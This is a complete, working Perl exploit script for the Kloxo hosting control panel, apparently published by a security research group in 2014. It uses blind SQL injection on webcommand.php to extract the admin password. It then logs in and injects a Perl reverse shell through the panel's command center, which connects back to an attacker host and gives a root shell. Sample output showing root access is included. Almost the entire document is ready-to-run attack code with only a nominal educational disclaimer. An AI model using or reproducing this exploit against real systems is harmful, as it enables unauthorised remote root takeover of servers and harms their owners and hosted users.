#!/usr/bin/perl
#
# Title: Kloxo remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 28 January 2014
# Published: 26 February 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Download:
# http://www.morxploit.com/morxploits/morxkloxo.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Tested on CentOS 5.8 and 5.9
# Should work on CentOS/RHEL 5.x
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# perl morxkloxo.pl http://******.com:7778 **.**.**.** 31337
#
# ===================================================
# --- Kloxo remote root exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://******.com:7778
# [*] It might take a little while, so sit your ass down and relax
# [+] Base64 pwd: bW9yeHBsb2l0
# [+] Got admin password: morxploit
# [*] Logging in ...
# [+] Successfully logged in!
# [*] Trying to get server info
# [+] Done!
# [*] Trying to inject connect back shell
# [+] Looks good, now waiting for root shell
# [+] Et voila you are in!
#
# Linux ******.com 2.6.18-308.8.2.el5.028stab101.1PAE #1 SMP Sun Jun 24 21:40:20 MSD 2012 i686 i686 i386 GNU/Linux
# uid=0(root) gid=0(root)
use LWP::UserAgent;
use IO::Socket;
use strict;
use MIME::Base64;
sub banner {
system('clear');
print "===================================================\n";
print "--- Kloxo remote root exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport> <verbose>\n";
print "perl $0 http://localhost:7778 127.0.0.1 31337\n";
exit;
}
my $host = $ARGV[0];
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $v = $ARGV[3];
my $pos = "8";
my $start = "48";
my $ends = "122";
my $password;
my $char;
my $cookie;
my $decoded;
my $class;
my $lhost;
$| = 1;
$SIG{CHLD} = 'IGNORE';
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
my $up = $ua->get("$host");
unless ($up->is_success) {
print "[-] Error: " . $up->status_line . "\n";
exit;
}
banner();
print "[*] Verbose mode on!\n" if (defined $v);
print "[*] MorXploiting $host\n";
print "[*] It might take a little while, so sit your ass down and relax\n";
my $check = "lbin/webcommand.php";
my $kloxo = $ua->get("$host/$check");
unless ($kloxo->decoded_content =~ /__error_only_clients_and_auxiliary_allowed_to_login/) {
print "[-] Doesn't seem like $host is running kloxo\n";
exit;
}
while ($pos) {
for(my $count=$start;$count<=$ends;$count++) {
if (($count > 57) && ($count < 61) || ($count > 90) && ($count < 97)) {
next;
}
my $query = "lbin/webcommand.php?login-class=client&login-name=a%27%20union%20select%20%27%241%24Tw5.g72.%24/0X4oceEHjGOgJB/fqRww/%27%20from%20client%20where%20ascii%28substring%28%28%20select%20realpass%20from%20client%20limit%201%29%2c$pos%2c1%29%29%3d$count%23&login-password=123456";
my $page = $ua->get("$host/$query");
print "\r[*] Trying char/position: $count/$pos" if (defined $v);
if (($page->is_success) && ($page->decoded_content =~ /^\s*$/)) {
$char = chr($count);
$password .= $char;
print "\n" if (defined $v);
print "\r[+] Base64 pwd: $password";
sleep (2) if (defined $v);
last;
}
}
my $passlength = length($password);
my $charlength = ($pos - 7);
if (($passlength < $charlength) && ($passlength != 0)) {
$decoded = decode_base64($password);
print "\n[+] Got admin password: $decoded\n";
last;
}
elsif ($passlength == 0) {
print "\n[-] Failed, probably not vulnerable\n";
exit;
}
$pos++
}
print "[*] Logging in ...\n";
my $kloxo = $ua->post("$host/htmllib/phplib/",[ "frm_clientname"=> "admin", "frm_password"=> "$decoded", "login" => "Login" ] );
if ($kloxo->as_string =~ /Set-Cookie: kloxo-session-id=(.*?);/) {
print "[+] Successfully logged in!\n";
$cookie = $1;
}
else {
print "[-] Couldn't log in\n";
exit;
}
print "[*] Trying to get server info\n";
my $getinfo = $ua->get("$host/display.php?frm_action=show", 'Cookie' => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie");
if ($getinfo->decoded_content =~ /commandcenter">(.*?)">/s) {
my $pserver = $1;
$pserver =~ /value =\"(.*)/;
$class = $1;
}
else {
print "[-] Couldn't get info, trying default settings\n";
$class = "pserver";
}
if ($getinfo->decoded_content =~ /name="frm_o_o\[0\]\[class\]" value ="$class">(.*?)">/s) {
my $nname = $1;
$nname =~ /value =\"(.*)/;
$lhost = $1;
}
else {
print "[-] Couldn't get info, trying default settings\n";
$lhost = "localhost";
}
print "[+] Done!\n";
my $ua2 = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua2->timeout(10);
print "[*] Trying to inject connect back shell\n";
my $inject = $ua2->post("$host/display.php",
Content_Type => 'form-data',
Cookie => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie",
Content => [
'frm_o_o[0][class]' => "$class",
'frm_o_o[0][nname]' => "$lhost",
'frm_pserver_c_ccenter_command' => "perl -MIO -e '\$p=fork;exit,if(\$p); use Socket; use FileHandle; my \$system = \"/bin/sh\"; my \$host = \"$cbhost\"; my \$port = \"$cbport\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")); connect(SOCKET, sockaddr_in(\$port, inet_aton(\$host))); SOCKET->autoflush(); open(STDIN, \">&SOCKET\"); open(STDOUT,\">&SOCKET\"); open(STDERR,\">&SOCKET\"); print \"[+] Et voila you are in!\\n\\n\"; system(\"uname -a;id\"); system(\$system);'",
'frm_action' => 'updateform',
'frm_subaction' => 'commandcenter',
'frm_change' => 'Execute',
],
);
unless ($inject->as_string =~ /200 OK/) {
print "[-] Something went wrong\n";
exit;
}
print "[+] Looks good, now waiting for root shell\n";
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}
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